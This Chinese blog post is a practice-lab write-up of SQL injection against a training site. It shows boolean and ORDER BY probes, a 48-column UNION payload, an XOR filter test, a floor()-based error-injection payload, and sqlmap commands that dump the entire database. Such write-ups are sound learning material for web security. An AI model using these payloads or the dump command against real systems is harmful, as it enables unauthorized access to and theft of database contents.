<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>易锦靶场新手区SQL注入 | 一只小白</title><meta name="description" content="注入点通过群里讲师得到，id&#x3D;95存在注入，其他不存在，我试了一下也是不存在。http:&#x2F;&#x2F;lab.yijincc.com:50006&#x2F;?m&#x3D;home&amp;c&#x3D;View&amp;a&#x3D;index&amp;aid&#x3D;95 注入类型通过id初步判断时数字型注入，输入95 and 1&#x3D;1,页面无异常输入95 and 1&#x3D;2页面不存在，说明存在数字型注入 获取返回列经过测试发现order by 48回显正"><meta name="keywords" content="SQL实战"><meta name="author" content="XiaoPu"><meta name="copyright" content="XiaoPu"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.ico"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="dns-prefetch" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin="crossorigin"/><link rel="dns-prefetch" href="https://fonts.googleapis.com"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="dns-prefetch" href="//busuanzi.ibruce.info"/><meta name="twitter:card" content="summary"><meta name="twitter:title" content="易锦靶场新手区SQL注入"><meta name="twitter:description" content="注入点通过群里讲师得到，id&#x3D;95存在注入，其他不存在，我试了一下也是不存在。http:&#x2F;&#x2F;lab.yijincc.com:50006&#x2F;?m&#x3D;home&amp;c&#x3D;View&amp;a&#x3D;index&amp;aid&#x3D;95 注入类型通过id初步判断时数字型注入，输入95 and 1&#x3D;1,页面无异常输入95 and 1&#x3D;2页面不存在，说明存在数字型注入 获取返回列经过测试发现order by 48回显正"><meta name="twitter:image" content="https://img.xpctf.cn/img/20200701211244.png"><meta property="og:type" content="article"><meta property="og:title" content="易锦靶场新手区SQL注入"><meta property="og:url" content="https://www.xpctf.cn/posts/2f9a/"><meta property="og:site_name" content="一只小白"><meta property="og:description" content="注入点通过群里讲师得到，id&#x3D;95存在注入，其他不存在，我试了一下也是不存在。http:&#x2F;&#x2F;lab.yijincc.com:50006&#x2F;?m&#x3D;home&amp;c&#x3D;View&amp;a&#x3D;index&amp;aid&#x3D;95 注入类型通过id初步判断时数字型注入，输入95 and 1&#x3D;1,页面无异常输入95 and 1&#x3D;2页面不存在，说明存在数字型注入 获取返回列经过测试发现order by 48回显正"><meta property="og:image" content="https://img.xpctf.cn/img/20200701211244.png"><meta property="article:published_time" content="2020-07-01T13:11:27.000Z"><meta property="article:modified_time" content="2021-09-02T06:37:35.429Z"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>var autoChangeMode = 'false'
var t = Cookies.get("theme")
if (autoChangeMode == '1'){
  var isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
  var isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
  var isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined){
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport){
      console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour < 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
  }
  } else if (t == 'light') activateLightMode()
  else activateDarkMode()

} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="https://www.xpctf.cn/posts/2f9a/"><link rel="prev" title="sqli-labs靶场详解笔记" href="https://www.xpctf.cn/posts/caa2/"><link rel="next" title="SQL注入学习笔记2" href="https://www.xpctf.cn/posts/d106/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://www.xpctf.cn/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: true,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: true,
  highlightCopy: true,
  highlightLang: true,
  highlightShrink: 'false',
  isFontAwesomeV5: false,
  isPhotoFigcaption: true,
  islazyload: false,
  isanchor: true
  
}</script><script>var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isSidebar: true  
  }</script><noscript><style>
#page-header {
  opacity: 1
}
.justified-gallery img{
  opacity: 1
}
</style></noscript><meta name="generator" content="Hexo 5.4.0"></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">47</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">37</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">10</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于</span></a></div></div></div></div><i class="fa fa-arrow-right on" id="toggle-sidebar" aria-hidden="true">     </i><div id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E7%82%B9"><span class="toc-number">1.</span> <span class="toc-text">注入点</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E7%B1%BB%E5%9E%8B"><span class="toc-number">2.</span> <span class="toc-text">注入类型</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E8%BF%94%E5%9B%9E%E5%88%97"><span class="toc-number">3.</span> <span class="toc-text">获取返回列</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqlmap"><span class="toc-number">4.</span> <span class="toc-text">sqlmap</span></a></li></ol></div></div></div><div id="body-wrap"><div class="post-bg" id="nav" style="background-image: url(https://img.xpctf.cn/img/20200701211244.png)"><div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/">一只小白</a></span><span class="pull_right menus"><div id="search_button"><a class="site-page social-icon search"><i class="fa fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于</span></a></div></div><span class="toggle-menu close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span></span></div><div id="post-info"><div id="post-title"><div class="posttitle">易锦靶场新手区SQL注入</div></div><div id="post-meta"><div class="meta-firstline"><time class="post-meta__date"><span class="post-meta__date-created" title="发表于 2020-07-01 21:11:27"><i class="fa fa-calendar" aria-hidden="true"></i> 发表于 2020-07-01</span><span class="post-meta__separator">|</span><span class="post-meta__date-updated" title="更新于 2021-09-02 14:37:35"><i class="fa fa-history" aria-hidden="true"></i> 更新于 2021-09-02</span></time><span class="post-meta__categories"><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Web/">Web</a></span></div><div class="meta-secondline"> <span class="post-meta-wordcount"><i class="post-meta__icon fa fa-file-word-o" aria-hidden="true"></i><span>字数总计:</span><span class="word-count">510</span><span class="post-meta__separator">|</span><i class="post-meta__icon fa fa-clock-o" aria-hidden="true"></i><span>阅读时长: 2 分钟</span></span></div><div class="meta-thirdline"><span class="post-meta-pv-cv"><span class="post-meta__separator">|</span><i class="fa fa-eye post-meta__icon" aria-hidden="true"> </i><span>阅读量:</span><span id="busuanzi_value_page_pv"></span></span><span class="post-meta-commentcount"></span></div></div></div></div><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h2 id="注入点"><a href="#注入点" class="headerlink" title="注入点"></a>注入点</h2><p>通过群里讲师得到，id=95存在注入，其他不存在，我试了一下也是不存在。<br><a target="_blank" rel="noopener" href="http://lab.yijincc.com:50006/?m=home&c=View&a=index&aid=95">http://lab.yijincc.com:50006/?m=home&amp;c=View&amp;a=index&amp;aid=95</a></p>
<h2 id="注入类型"><a href="#注入类型" class="headerlink" title="注入类型"></a>注入类型</h2><p>通过id初步判断时数字型注入，输入95 and 1=1,页面无异常<br><img src="https://img.xpctf.cn/img/20200701211641.png" alt=""><br>输入95 and 1=2页面不存在，说明存在数字型注入<br><img src="https://img.xpctf.cn/img/20200701211818.png" alt=""></p>
<h2 id="获取返回列"><a href="#获取返回列" class="headerlink" title="获取返回列"></a>获取返回列</h2><p>经过测试发现order by 48回显正常(我的天48个)，union联合查询获取回显位置，payload：<code>95 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48</code><br><img src="https://img.xpctf.cn/img/20200701212420.png" alt=""><br>回显不是我们期待的，考虑过滤了union，使用异或测试union。<code>95^(length(&#39;union&#39;)=5)</code><br><img src="https://img.xpctf.cn/img/20200701212657.png" alt=""><br>如果未被过滤，最后运算结果应该是95，异或注入回显一致说明没有被过滤，但返回的不是aid为95的页面，是aid为94的页面，后来我发现没改aid，改成-95<br><img src="https://img.xpctf.cn/img/20200701212521.png" alt=""><br>改为95就404了，可能是过滤了select之类的，使用异或测试都没有被过滤。联想到一开始得到的结论 只有aid为95猜存在注入<br><img src="https://img.xpctf.cn/img/20200702084506.png" alt=""><br>后来我删了一个列，发现了报错注入，尝试了extractvalue报错注入无果<br><img src="https://img.xpctf.cn/img/20200702084931.png" alt=""><br>后来使用 floor注入发现成功了，payload：<code>and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x) a)</code><br><img src="https://img.xpctf.cn/img/20200702085136.png" alt=""></p>
<h2 id="sqlmap"><a href="#sqlmap" class="headerlink" title="sqlmap"></a>sqlmap</h2><p>昨晚找到floor报错注入，今天又用了sqlmap来跑，通过指定参数来爆破<br>语句：py -3 sqlmap.py -u “<a target="_blank" rel="noopener" href="http://lab.yijincc.com:50006/?m=home&amp;c=View&amp;a=index&amp;aid=95&quot;">http://lab.yijincc.com:50006/?m=home&amp;c=View&amp;a=index&amp;aid=95&quot;</a> -p aid –batch<br>跑了一会发现三种注入方式，分别是布尔盲注，报错注入，时间盲注。<br><img src="https://img.xpctf.cn/img/20200702085619.png" alt=""><br>因为这是靶场，接下来就是脱库了，sqlmap比自己写脚本来的快，<br>语句：py -3 sqlmap.py -u “<a target="_blank" rel="noopener" href="http://lab.yijincc.com:50006/?m=home&amp;c=View&amp;a=index&amp;aid=95&quot;">http://lab.yijincc.com:50006/?m=home&amp;c=View&amp;a=index&amp;aid=95&quot;</a> -p aid –dump-all –batch</p>
<p><strong>测试结束</strong></p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">XiaoPu</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://www.xpctf.cn/posts/2f9a/">https://www.xpctf.cn/posts/2f9a/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://www.xpctf.cn" target="_blank">一只小白</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/SQL%E5%AE%9E%E6%88%98/">SQL实战</a></div><div class="post_share"><div class="social-share" data-image="https://img.xpctf.cn/img/202109021456764.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"/><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-button button--primary button--animated"> <i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="post-qr-code__img" src="/img/wechat.jpg" alt="微信"/><div class="post-qr-code__desc">微信</div></li><li class="reward-item"><img class="post-qr-code__img" src="/img/alipay.jpg" alt="支付宝"/><div class="post-qr-code__desc">支付宝</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/posts/caa2/"><img class="prev_cover" src="https://img.xpctf.cn/img/20200704210235.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">sqli-labs靶场详解笔记</div></div></a></div><div class="next-post pull_right"><a href="/posts/d106/"><img class="next_cover" src="https://img.xpctf.cn/img/20200530144523.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">SQL注入学习笔记2</div></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fa fa-fw fa-thumbs-up" aria-hidden="true"></i><span> 相关推荐</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/posts/caa2/" title="sqli-labs靶场详解笔记"><img class="relatedPosts_cover" src="https://img.xpctf.cn/img/20200704210235.png"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-07-04</div><div class="relatedPosts_title">sqli-labs靶场详解笔记</div></div></a></div></div><div class="clear_both"></div></div><hr><div id="post-comment"><div class="comment_headling"><i class="fa fa-comments fa-fw" aria-hidden="true"></i><span> 评论</span></div><div class="vcomment" id="vcomment"></div><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var requestSetting = function (from,set) {
  var from = from
  var setting = set.split(',').filter(function(item){
  return from.indexOf(item) > -1
  });
  setting = setting.length == 0 ? from :setting;
  return setting
}

var guestInfo = requestSetting(['nick','mail','link'],'nick,mail,link')
var requiredFields = requestSetting(['nick','mail','link'],'nick,mail')

window.valine = new Valine({
  el:'#vcomment',
  appId: 'adT2HesNUqwHDh4xp5GslrsX-gzGzoHsz',
  appKey: 'Mq44asxphpP9OIUwp6gCCOA7',
  notify: false,
  verify: true,
  placeholder: '(͒˶´⚇`˵)͒  快来留下你的小脚印吧~~',
  avatar: 'monsterid',
  meta: guestInfo,
  pageSize: '10',
  lang: 'zh-CN',
  recordIP: true,
  serverURLs: '',
  emojiCDN: '',
  emojiMaps: "",
  enableQQ: true,
  requiredFields: requiredFields
});</script></div></article></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2021 By XiaoPu</div><div class="framework-info"><span>驱动 </span><a target="_blank" rel="noopener" href="https://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly"><span>Butterfly</span></a></div><div class="sitemap"><a href="/sitemap.xml"><span>Google地图</span></a><span class="footer-separator">|</span><a href="/baidusitemap.xml"><span>Baidu地图</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换" target="_self">繁</a><i class="darkmode fa fa-moon-o" id="darkmode" title="夜间模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><a id="to_comment" href="#post-comment" title="直达评论"><i class="scroll_to_comment fa fa-comments">  </i></a><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div></div><hr/><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@3/instantpage.min.js" type="module"></script><script src="/js/search/local-search.js"></script><script src="/live2d-widget/autoload.js"></script></body></html>